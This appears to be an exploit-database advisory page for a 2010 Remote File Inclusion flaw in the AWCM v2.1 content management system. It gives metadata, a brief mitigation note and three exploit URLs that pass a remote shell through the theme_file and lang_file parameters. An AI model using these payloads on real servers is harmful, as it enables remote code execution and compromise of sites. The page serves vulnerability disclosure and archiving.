awcm v2.1 final Remote File Inclusion

vendor:

AWCM

by:

LoSt.HaCkEr ~ aDaM_TRoJaN

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: AWCM

Affected Version From: v2.1

Affected Version To: v2.1

Patch Exists: NO

Related CWE: N/A

CPE: awcm

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

awcm v2.1 final Remote File Inclusion

The AWCM v2.1 final is vulnerable to Remote File Inclusion. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

[+]Exploit Title: [awcm v2.1 final Remote File Inclusion]
[+]Date: [13-11-2010]
[+]Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
[+]Software Link: [www.awcm-cms.com]
[+]Version: [v2.1]
[+]CVE :I'M IRaQi ~ Hacker town of Musayyib
[+]Contact: LoSt.HaCkEr[at]yahoo[dot]com ~0r~ LoSt.HaCkEr[at]HaCkEr.ps
http://sourceforge.net/projects/awcm/files/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+]Exploit: http://target/awcm v2.1 final/awcm/includes/window_top.php?theme_file=[ShELL]
[+]Exploit: http://target/awcm v2.1 final/awcm/control/common.php?lang_file=[ShELL]
[+]Exploit: http://target/awcm v2.1 final/awcm/header.php?theme_file=[EV!L] 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetings:  No Greet  !_!